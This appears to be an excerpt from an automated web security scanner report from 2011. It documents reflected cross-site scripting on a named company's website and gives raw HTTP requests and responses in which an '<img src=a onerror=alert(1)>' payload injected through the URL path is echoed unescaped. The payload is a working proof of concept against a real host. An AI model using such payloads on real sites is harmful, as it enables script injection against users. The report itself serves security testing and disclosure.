1. Cross-site scripting (reflected)
1.1. http://ww2.infoblox.com/products/vNIOS-trial-form.cfm [REST URL parameter 1]
Severity: High
Confidence: Certain
Host: http://ww2.infoblox.com
Path: /products/vNIOS-trial

GET /productscd711%253cimg%2520src
Host: ww2.infoblox.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoblox.com
Cookie: __utma=260543314

HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 09 Nov 2011 23:03:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<META HTTP-EQUIV=Refresh CONTENT="0; URL=http://www.infoblox
<html>
<head>
<meta http-equiv="Content
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
File not found: /productscd711<img src=a onerror=alert(1)
</h1>
...[SNIP]...

Severity: High
Confidence: Certain
Host: http://ww2.infoblox.com
Path: /products/vNIOS-trial

GET /products/vNIOS-trial
Host: ww2.infoblox.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoblox.com
Cookie: __utma=260543314

HTTP/1.1 200 OK
Connection: close
Date: Wed, 09 Nov 2011 23:03:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<SCRIPT LANGUAGE="JavaScript">
document.domain = "infoblox.com";
</SCRIPT>
<SCRIPT LANGUAGE="JavaScript">
document
...[SNIP]...
if (window.name != "ifbody") top.location.href = "http://www.infoblox.com
</SCRIPT>
...[SNIP]...